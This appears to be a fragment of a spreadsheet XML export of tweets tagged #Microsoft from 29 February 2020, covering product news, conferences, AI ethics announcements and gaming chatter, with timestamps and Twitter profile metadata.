#PC #Computers #Computing #ComputerRepair #PCRepair #TechTips #TechSupport #Windows10 #OEM #NVIDIA #AMD #WindowsUpdates #Microsoft https://t.co/LhaET5id05</t>
  </si>
  <si>
    <t>Sat Feb 29 14:52:42 +0000 2020</t>
  </si>
  <si>
    <t>#Register at https://t.co/046Lp3cgMS and get access to hundreds of #document #template - no need to start a draft doc from scratch. Just #access any of our #free templates -
#microsoft #smart #solution #picture #design #SmallBusiness #business #Sales #excel #powerpoint #startup https://t.co/PB7QDgtI6b</t>
  </si>
  <si>
    <t>Sat Feb 29 14:50:00 +0000 2020</t>
  </si>
  <si>
    <t>"You are not creepy, you are developers." 
The one and only @TATTOOEDCRMGUY from #Microsoft,  inspiring, creative and refreshing as always.
#ss2020 #ScottishSummit https://t.co/GUfxySl4nW</t>
  </si>
  <si>
    <t>Sat Feb 29 14:49:04 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft microsoft news and msn and account profile image have issues</t>
  </si>
  <si>
    <t>Sat Feb 29 14:46:10 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft drops Cortana consumer skills in new Windows 10 update https://t.co/Yn6K84Oeoj</t>
  </si>
  <si>
    <t>{'id': 4083802032, 'id_str': '4083802032', 'name': 'Tomeka Ridley', 'screen_name': 'tomeka_ridley', 'location': '', 'description': 'Follower of Jesus. Avid bible reader. Prayer warrior. Loom knitter. Single mom to a handsome &amp; healthy little boy.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 42, 'friends_count': 55, 'listed_count': 0, 'created_at': 'Sat Oct 31 21:42:42 +0000 2015', 'favourites_count': 515, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1083,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'http://pbs.twimg.com/profile_images/1063944192110473216/l0E8LHCQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1063944192110473216/l0E8LHCQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4083802032/1526454722',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</si>
  <si>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14:33:41 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft sees a high probability of not meeting its previously given guidance for Windows segment in the current quarter.
#Microsoft #StockMarketNews #Coronavirus #China #BillGates 
@Microsoft 
https://t.co/Hy6Z1NdjbL</t>
  </si>
  <si>
    <t>{'id': 531415099, 'id_str': '531415099', 'name': 'iNVEZZ', 'screen_name': 'InvezzPortal', 'location': 'London, UK', 'description': 'Invezz is a leading news &amp; guide portal for all things trading. From #stocks &amp; #forex all the way to #cryptocurrency, #realestate &amp; #commodities.', 'url': 'https://t.co/pSg6ltYahE', 'entities': {'url': {'urls': [{'url': 'https://t.co/pSg6ltYahE', 'expanded_url': 'https://invezz.com', 'display_url': 'invezz.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 884, 'friends_count': 1615, 'listed_count': 31, 'created_at': 'Tue Mar 20 16:31:53 +0000 2012', 'favourites_count': 151, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13280,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'http://pbs.twimg.com/profile_images/523135106018340864/0tUqnurx_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/523135106018340864/0tUqnurx_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/531415099/1414594603',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</si>
  <si>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14:32:30 +0000 2020</t>
  </si>
  <si>
    <t>Pope to endorse principles on #AI #ethics with Microsoft and IBM #vatican #EthicalAI #RomeCallForAIEthics #IBM #Microsoft https://t.co/vW9GyNm5HM</t>
  </si>
  <si>
    <t>{'id': 105268070, 'id_str': '105268070', 'name': 'Juha Sipola', 'screen_name': 'Juha_Sipola', 'location': 'Finland', 'description': 'Executive Partner at IBM Finland. Expert on Oil&amp;Gas, Defense, Public Safety and Industrial Products transformation and architecture. All views are my own.', 'url': 'https://t.co/t0aYUFvop3', 'entities': {'url': {'urls': [{'url': 'https://t.co/t0aYUFvop3', 'expanded_url': 'http://fi.linkedin.com/in/juhasipola', 'display_url': 'fi.linkedin.com/in/juhasipola', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 274, 'friends_count': 624, 'listed_count': 31, 'created_at': 'Fri Jan 15 21:56:27 +0000 2010', 'favourites_count': 260, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 854,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'http://pbs.twimg.com/profile_images/1202668342533857280/OOPuM_LR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1202668342533857280/OOPuM_LR_normal.jpg',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</si>
  <si>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14:30:01 +0000 2020</t>
  </si>
  <si>
    <t>Last week, James Phillips of Microsoft announced new AI features across the organization. 
https://t.co/2PpLo17dEC #AI #customerinsights #Microsoft</t>
  </si>
  <si>
    <t>{'id': 14079121, 'id_str': '14079121', 'name': 'enCloud9 Social/CRM', 'screen_name': 'enCloud9', 'location': 'United States', 'description': 'Microsoft Dynamics 365 Ninjas #MSDYN365', 'url': 'https://t.co/cqJTLSjwdx', 'entities': {'url': {'urls': [{'url': 'https://t.co/cqJTLSjwdx', 'expanded_url': 'http://www.encloud9.com', 'display_url': 'encloud9.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2646, 'friends_count': 557, 'listed_count': 270, 'created_at': 'Tue Mar 04 18:26:41 +0000 2008', 'favourites_count': 19248, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17931,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'http://pbs.twimg.com/profile_images/474758230598381568/hP7YrKu8_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/474758230598381568/hP7YrKu8_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14079121/1512751011',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</si>
  <si>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14:26:41 +0000 2020</t>
  </si>
  <si>
    <t>Anti-Bias Pill for #SiliconValley #Seattle &amp;amp; #FakeNews. Replace "Joe Biden" in this story with @realDonaldTrump and model your brain activity using #MachineLearning #AI Ensemble Algorithms. #Facebook #Google #Amazon #Microsoft. #Deplorables #MAGA #KAG
https://t.co/pfGquAwLb1</t>
  </si>
  <si>
    <t>{'id': 751504204166930432, 'id_str': '751504204166930432', 'name': 'Ice Quotients', 'screen_name': 'ICEQuotient', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 0, 'listed_count': 3, 'created_at': 'Fri Jul 08 19:52:19 +0000 2016', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3401, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/767480528580640768/37LUbA6t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/767480528580640768/37LUbA6t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/751504204166930432/1471815167',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</si>
  <si>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14:26:35 +0000 2020</t>
  </si>
  <si>
    <t>The list of Microsoft exams that will be discontinued!
#microsoftexam #Microsoft 
https://t.co/iYRJAsQTbK</t>
  </si>
  <si>
    <t>Sat Feb 29 14:21:24 +0000 2020</t>
  </si>
  <si>
    <t>Talk to the Bot cos the face ain't listening!!! Looking forward to the Power Virtual Agent session with Matt Weston!! 
@scottishsummit 
#SS2020 #ScottishSummit #Dynamics365 #PowerPlatform #MSDyn365 #Dynamics #Microsoft #Summit #Glasgow #Saturday https://t.co/vXX98Y2d5x</t>
  </si>
  <si>
    <t>Sat Feb 29 14:18:47 +0000 2020</t>
  </si>
  <si>
    <t>Official Facebook App Removed From Windows 10 Store @tellforceblog https://t.co/7Ga5CP5D1T #Facebook #Microsoft #Windows #Windows10</t>
  </si>
  <si>
    <t>{'id': 864609396147576833, 'id_str': '864609396147576833', 'name': 'Esther', 'screen_name': 'OlubukolaFalana', 'location': 'Nigeria', 'description': 'Microbiologist and blogger', 'url': 'https://t.co/RmspCecWoq', 'entities': {'url': {'urls': [{'url': 'https://t.co/RmspCecWoq', 'expanded_url': 'http://www.tellforceblog.com', 'display_url': 'tellforceblog.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 128, 'friends_count': 96, 'listed_count': 0, 'created_at': 'Tue May 16 22:31:58 +0000 2017', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1967, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1091722148194988033/otSEHp5o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1091722148194988033/otSEHp5o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/864609396147576833/1549121827',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</si>
  <si>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14:16:50 +0000 2020</t>
  </si>
  <si>
    <t>The latest The Microsoft R Server Daily! https://t.co/6YW8584kj4 Thanks to @JVNiPedia @chenxingus @Satincorp #microsoft #azure</t>
  </si>
  <si>
    <t>Sat Feb 29 14:15:10 +0000 2020</t>
  </si>
  <si>
    <t>@Azure tip of the day:
#Microsoft #microsoftazure #Azure #linkedinlearning
https://t.co/56LNPJA87X</t>
  </si>
  <si>
    <t>Sat Feb 29 14:14:48 +0000 2020</t>
  </si>
  <si>
    <t>4 #Tech giants are in the race for quantum supremacy: #IBM #Google #Microsoft and #Honeywell
#QuantumComputing #quantum #quantumcomputers #technology https://t.co/44x3POUiKG</t>
  </si>
  <si>
    <t>{'id': 151397675, 'id_str': '151397675', 'name': 'Martijn van Dalen', 'screen_name': 'MGvanDalen', 'location': 'Utrecht, The Netherlands', 'description': 'Liberaal pur sang | Duurzaamheid | Utrecht | Wereldburger | Geloven in kansen | Innovatie | Change | Digital | Strategy | Raadslid Utrechtse VVD', 'url': 'https://t.co/8mlfDRS8eV', 'entities': {'url': {'urls': [{'url': 'https://t.co/8mlfDRS8eV', 'expanded_url': 'http://martijnvandalen.nl', 'display_url': 'martijnvandalen.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 827, 'friends_count': 436, 'listed_count': 86, 'created_at': 'Thu Jun 03 09:26:37 +0000 2010', 'favourites_count': 17920, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10567,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'http://pbs.twimg.com/profile_images/917315732836442112/bGcwoXEs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/917315732836442112/bGcwoXEs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/151397675/1507540047',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</si>
  <si>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14:10:31 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft + AT&amp;amp;T Partnership delivers 5G Network Edge Compute Technology
 #Gaming #NEC #Azure #Microsoft #AzureFamily
https://t.co/E9XbXrYlen</t>
  </si>
  <si>
    <t>Sat Feb 29 14:09:25 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #IBM join Pope Francis to push for 6 #AI principles : The #Vatican called for stronger #regulation of the use of #ArtificialIntelligence in a plan announced on Friday reported by #Reuters
#ML #EthicalAI #MachineLearning #dataprivacy #BigData https://t.co/c5j2Ctsfar</t>
  </si>
  <si>
    <t>Sat Feb 29 14:06:34 +0000 2020</t>
  </si>
  <si>
    <t>More on #AI and #healthcare from the majors - #Amazon, #Microsoft team up with Consumer Technology Association on healthcare AI standards https://t.co/ePTpIQ8Dp0</t>
  </si>
  <si>
    <t>{'id': 18165383, 'id_str': '18165383', 'name': 'Deborah Mansfield', 'screen_name': 'dotconnecter', 'location': 'Houston, TX', 'description': "I'm a resource connecter. Passions: biz strategy; early life science/dighealth/tech; networking. Focus: collaborative projects; entrepreneurship; funding.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2113, 'friends_count': 4551, 'listed_count': 132, 'created_at': 'Tue Dec 16 16:22:32 +0000 2008', 'favourites_count': 2456, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6044,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'http://pbs.twimg.com/profile_images/959505208014327808/-G_FaXiH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/959505208014327808/-G_FaXiH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18165383/1366917602',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</si>
  <si>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14:01:52 +0000 2020</t>
  </si>
  <si>
    <t>This just in!
Ceniden is going to the Southwest Mega User Group, in Grapevine, at the Grapevine Convention Center!
Join us from March 10 to March 11, from 8 a.m. to 5 p.m.
#Dallas #DFW #Instadallas #Instadfw #JoinUs #Infor #Lawson #Usergroup #Microsoft #Technew #BigTech https://t.co/CG4hVmK20z</t>
  </si>
  <si>
    <t>Sat Feb 29 14:01:43 +0000 2020</t>
  </si>
  <si>
    <t>Presenting to you the EB of International Corporate Summit 
Agenda- Privacy Concerns and AI 
#google #facebook #AI #privacy #OpenSource #Data #databreach #security #corporates #china #Microsoft #un #mun https://t.co/HLFfT4E7ZG</t>
  </si>
  <si>
    <t>{'id': 1026850307500695552, 'id_str': '1026850307500695552', 'name': 'MEC MUN Society', 'screen_name': 'ReachMECMUN', 'location': 'Cochin, India', 'description': "Kerala's first Model United Nations Society, comprising of students from Govt. Model Engineering College, Kochi.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 55, 'listed_count': 0, 'created_at': 'Tue Aug 07 15:19:26 +0000 2018', 'favourites_count': 207, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 132,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'http://pbs.twimg.com/profile_images/1129656702582677504/_sA4du3X_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1129656702582677504/_sA4du3X_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1026850307500695552/1533661275',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</si>
  <si>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14:00:41 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     Speed and accessibility do not have to come at the price of security. Use cloud apps with confidence knowing that your security team has the tools it needs to keep you secure with #Microsoft365. https://t.co/w2VOcCZ9lm</t>
  </si>
  <si>
    <t>Sat Feb 29 14:00:08 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Weekly reading: New to the #PowerApps game?  Check out our complete guide! https://t.co/wb3hg7cwsw
#microsoft #powerplatform #office365 #microsoft365 https://t.co/egpLuun4Mn</t>
  </si>
  <si>
    <t>Sat Feb 29 13:57:44 +0000 2020</t>
  </si>
  <si>
    <t>Great to be here at the #TYTPNcon in Athlone discussing #DigitalSkills with Educators #Certification #Microsoft #STEM #MOS @CertMatters @MS_eduIRL @TYTPNcon https://t.co/s0nIb5acAj</t>
  </si>
  <si>
    <t>Sat Feb 29 13:56:35 +0000 2020</t>
  </si>
  <si>
    <t>Tell is what kind of console you use
#GamingLife #consolechallenge #Instagram #Facebook #GpG 
#funfacts #games #Sony #Microsoft #PS4 #XboxOne #PCGamer @Castro1021 https://t.co/2QxU57cbRv</t>
  </si>
  <si>
    <t>{'id': 912980584317771777, 'id_str': '912980584317771777', 'name': 'Gunners Pro-Gaming', 'screen_name': 'OriginalGpG', 'location': 'Nederland', 'description': 'OfficialÂ®ï¸ Gunners Pro-Gaming Twitter page\n\nFacebook : Darcaiin for livestreams', 'url': 'https://t.co/WAqiQ9FFaS', 'entities': {'url': {'urls': [{'url': 'https://t.co/WAqiQ9FFaS', 'expanded_url': 'http://www.esportsgunners.nl', 'display_url': 'esportsgunners.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 249, 'friends_count': 206, 'listed_count': 0, 'created_at': 'Wed Sep 27 10:01:48 +0000 2017', 'favourites_count': 286, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 294, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1206278269814882304/o0pxiL8c_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206278269814882304/o0pxiL8c_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/912980584317771777/1576435534',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</si>
  <si>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13:53:23 +0000 2020</t>
  </si>
  <si>
    <t>Mother and son art time.  #surface #microsoft #art https://t.co/vXBagv1jTw</t>
  </si>
  <si>
    <t>{'id': 15126106, 'id_str': '15126106', 'name': 'egdeseldeeN', 'screen_name': 'Needlesedge', 'location': '', 'description': 'Father. Vegan. Vape Guy. Bad Gamer. Lover of books and consumer of too much coffee.', 'url': 'https://t.co/yK9whoHxik', 'entities': {'url': {'urls': [{'url': 'https://t.co/yK9whoHxik', 'expanded_url': 'http://needlesedge.wordpress.com', 'display_url': 'needlesedge.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 233, 'friends_count': 896, 'listed_count': 8, 'created_at': 'Sun Jun 15 16:55:11 +0000 2008', 'favourites_count': 2501, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11157,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'http://pbs.twimg.com/profile_images/870296119036850177/WmS6noVb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/870296119036850177/WmS6noVb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15126106/1463959052', 'profile_link_color': '981CEB',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</si>
  <si>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Sat Feb 29 13:51:26 +0000 2020</t>
  </si>
  <si>
    <t>If next gen can have better ventilation it would be a blessing, because I grew up with the 360 and anytime you heard that console heating up you feared for the RROD.
#Microsoft #SONY</t>
  </si>
  <si>
    <t>{'id': 4331108715, 'id_str': '4331108715', 'name': 'CJ', 'screen_name': 'ALL4Colin', 'location': 'Mount Olympus ', 'description': 'Pro Tweeter, Cleveland Cavs diehard fan, &amp; has a secret map to Hyrule Fieldâ„¢ï¸ Here you will find pro tweets and video game image drops.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 0, 'listed_count': 2, 'created_at': 'Mon Nov 30 17:38:05 +0000 2015', 'favourites_count': 333, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2853,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'http://pbs.twimg.com/profile_images/1183479691388301312/LhkjSAHV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1183479691388301312/LhkjSAHV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4331108715/1573176876',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</si>
  <si>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13:50:14 +0000 2020</t>
  </si>
  <si>
    <t>Our Inside-Out Series is for advanced computer users, Inside Out is the authoritative source for help with Microsoft personal productivity applications.
Read our popular book: https://t.co/IqibXPCGlC
#microsoft #PHIBooks #microsoftpress https://t.co/0yKJJRlWbK</t>
  </si>
  <si>
    <t>Sat Feb 29 13:42:43 +0000 2020</t>
  </si>
  <si>
    <t>DevOPS Engineering on AWS
Know More;
https://t.co/WwIVc9rOnn
#aws,#cloudcomputing,#devops,#azure,#amazon,#amazonwebservices,#database,#innovation,#bigdata,#cloud,#datascience,#developer,#CumhurbaskanErdogan,#microsoft,#technology,#LeapDay,#SaturdayMorning,#hoax,#satchat,#google https://t.co/5c2ROxyis2</t>
  </si>
  <si>
    <t>Sat Feb 29 13:40:31 +0000 2020</t>
  </si>
  <si>
    <t>Yeah
#Xbox #XboxOne #XboxOneX #TheDivision2 #Ubisoft #microsoft #Gears5 https://t.co/fIJ5Dp8fH3</t>
  </si>
  <si>
    <t>{'id': 1220380752904425474, 'id_str': '1220380752904425474', 'name': 'Ikari â˜¢ï¸', 'screen_name': 'Ikari97997375', 'location': 'ZONE5ï¸âƒ£1ï¸âƒ£', 'description': 'Sport et jeux vidÃ©o constitue mes deux passions.ðŸ‡«\n#xbox gamingðŸŽ® / old school gaming ðŸ•¹ï¸\nKickboxingðŸ¥‹ / musculationðŸ’ª\nGT : DEACON FROSTE', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 242, 'listed_count': 0, 'created_at': 'Thu Jan 23 16:20:31 +0000 2020', 'favourites_count': 255, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 66, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232583586596970496/149Cl7Kp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232583586596970496/149Cl7Kp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1220380752904425474/1580587610',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</si>
  <si>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13:30:28 +0000 2020</t>
  </si>
  <si>
    <t>A5 Free collaborative #EdTech help empower Ts + Ss to act for social good because they can connect + share on a global scale eg
#Flipgrid
#Skype
#Zoom
#Wakelet
#Microsoft
#Google 
Also projects eg #GoalsProject #ClimateActionP #NoMorePlastic #TakeActionProject 
 #EdChatEU</t>
  </si>
  <si>
    <t>{'id': 34722043, 'id_str': '34722043', 'name': 'Kirsten Thompson | #MSFTEduChat She/her ðŸŒðŸ‡¬ðŸ‡§ðŸ‡¦ðŸ‡¹', 'screen_name': 'iamKirstenT', 'location': 'OD&amp;PL University of Leeds', 'description': '#DigitalUniLeeds #UoLTEL| @SDGLabSchools #TakeActionProject  #ProjectKakuma #KakumaAcademy âž¡ï¸https://t.co/N78Si9aoJl #SDGWomen|#BePartOfResearch #FibroðŸ»â¤ï¸', 'url': 'https://t.co/vA8OJwaaPW', 'entities': {'url': {'urls': [{'url': 'https://t.co/vA8OJwaaPW', 'expanded_url': 'http://rockyourdigital.com/becoming-global-changemakers', 'display_url': 'rockyourdigital.com/becoming-globaâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/N78Si9aoJl', 'expanded_url': 'http://fundraiser.projectkakuma.com', 'display_url': 'fundraiser.projectkakuma.com', 'indices': [93, 116]}]}}, 'protected': False, 'followers_count': 3009, 'friends_count': 2861, 'listed_count': 168, 'created_at': 'Thu Apr 23 20:38:47 +0000 2009', 'favourites_count': 11748, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11300, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme20/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme20/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234221650859757571/Ab-n6xwS_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234221650859757571/Ab-n6xwS_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/34722043/1583096332',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</si>
  <si>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13:30:01 +0000 2020</t>
  </si>
  <si>
    <t>Here at Microsoft we moved to #MicrosoftTeams and now our #meetings are simpler. #Teams #Microsoft #Microsoft365 #Office365 https://t.co/LPQ9stoqEi</t>
  </si>
  <si>
    <t>Sat Feb 29 13:30:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft empowers #Sapienza #University of #Rome to step into the future - #Italy Marco Casini https://t.co/CPGRcJaTnP #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sat Feb 29 13:26:46 +0000 2020</t>
  </si>
  <si>
    <t>New #Microsoft #VSCode browser editor update  better #Go, #Python language, #Docker support https://t.co/9GSONmxNJb</t>
  </si>
  <si>
    <t>{'id': 3079730591, 'id_str': '3079730591', 'name': 'massiot cloud', 'screen_name': 'massiotcloud', 'location': 'Paris, France', 'description': 'GEEK | Cloud | Virtualisation | Docker | SmartOS | CoreOS | RancherOS | DevOps | NoOps | BizDevOps | Vagrant | MicroServices | Serverless', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 78, 'friends_count': 298, 'listed_count': 38, 'created_at': 'Sun Mar 08 16:56:50 +0000 2015', 'favourites_count': 358, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 375,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'http://pbs.twimg.com/profile_images/597352957139628032/EWF77z8Q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/597352957139628032/EWF77z8Q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3079730591/1431254819',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</si>
  <si>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13:25:41 +0000 2020</t>
  </si>
  <si>
    <t>Let's build a responsive Canvas App with  @rappem ... LET'S DO THIS!!! 
@scottishsummit 
#SS2020 #ScottishSummit #Microsoft #PowerApps #CanvasApps #PowerAddicts #TDG #MSDyn365 #Dynamics365 #IngramMicroCloud https://t.co/uItrpPzNLA</t>
  </si>
  <si>
    <t>Sat Feb 29 13:22:30 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 13:20:42 +0000 2020</t>
  </si>
  <si>
    <t>Vatican joins #IBM, #Microsoft to call for #FacialRecognition regulation
#cybersecurity #privacy #dataprivacy #authentication #biometrics #regulation
https://t.co/eIgUooL1lu</t>
  </si>
  <si>
    <t>{'id': 3408927123, 'id_str': '3408927123', 'name': 'É¦Ö…Õ¼É›ÊÖ„Ö…È¶', 'screen_name': 'zMrDevJ', 'location': '/dev/null', 'description': "$~: Master Student in Network Systems and Security. Writer at @rev3rsesecurity's blog and at @thestartup_.\nPosting #news about #cybersecurity.", 'url': 'https://t.co/uFXBdGFOWQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/uFXBdGFOWQ', 'expanded_url': 'https://marioraciti.ml', 'display_url': 'marioraciti.ml', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 177, 'friends_count': 96, 'listed_count': 3, 'created_at': 'Sat Aug 08 18:28:16 +0000 2015', 'favourites_count': 2494, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1032,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'http://pbs.twimg.com/profile_images/1166484997328592896/D-YiuUR7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1166484997328592896/D-YiuUR7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3408927123/1566947427', 'profile_link_color': '26C6DA',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</si>
  <si>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13:20:04 +0000 2020</t>
  </si>
  <si>
    <t>Support for Azure DevOps Services is now included with Azure support plans Starting February 24, the legacy Basic (no-charge) and Premium (pay-per-incident) support options for Azure DevOps Services will be ret... #microsoft https://t.co/fcBoj8kEnu</t>
  </si>
  <si>
    <t>Sat Feb 29 13:19:35 +0000 2020</t>
  </si>
  <si>
    <t>#IBM and #Microsoft support the #Vaticans guidelines for ethical #AI: The Rome Call for AI #Ethics recommends AI that safeguards #humanrights. https://t.co/JAKnTl0JrQ</t>
  </si>
  <si>
    <t>{'id': 86102825, 'id_str': '86102825', 'name': 'Nikola Danaylov', 'screen_name': 'singularityblog', 'location': 'worldwide', 'description': 'Bestselling Author, Keynote Speaker, Vegan Futurist, Blogger &amp; Podcaster on the Singularity, Transhumanism, AI &amp; Ethics', 'url': 'http://t.co/56S5kpwNML', 'entities': {'url': {'urls': [{'url': 'http://t.co/56S5kpwNML', 'expanded_url': 'http://www.SingularityWeblog.com', 'display_url': 'SingularityWeblog.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8294, 'friends_count': 1462, 'listed_count': 666, 'created_at': 'Thu Oct 29 16:17:29 +0000 2009', 'favourites_count': 5113, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15652, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '527F25', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/810696729339183105/epBTiYff_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/810696729339183105/epBTiYff_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/86102825/1492892525',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</si>
  <si>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13:18:43 +0000 2020</t>
  </si>
  <si>
    <t>Morning sessions complete here at @scottishsummit with 3 fab sessions  with @alberthoitingh , @techChirag and @pjcov 
#SSSummit #Glasgow #Microsoft @StandsureTech https://t.co/m8A5YCT7kN</t>
  </si>
  <si>
    <t>Sat Feb 29 13:18:25 +0000 2020</t>
  </si>
  <si>
    <t>Courts rule out #Heathrow expansion, corporations like #Microsoft and #Amazon announce climate change initiatives, #Blackrock thinks #climatecrisis is the biggest risk for their investments. 
Are politicians the only ones holding us back? 
https://t.co/zwo19d0AX0</t>
  </si>
  <si>
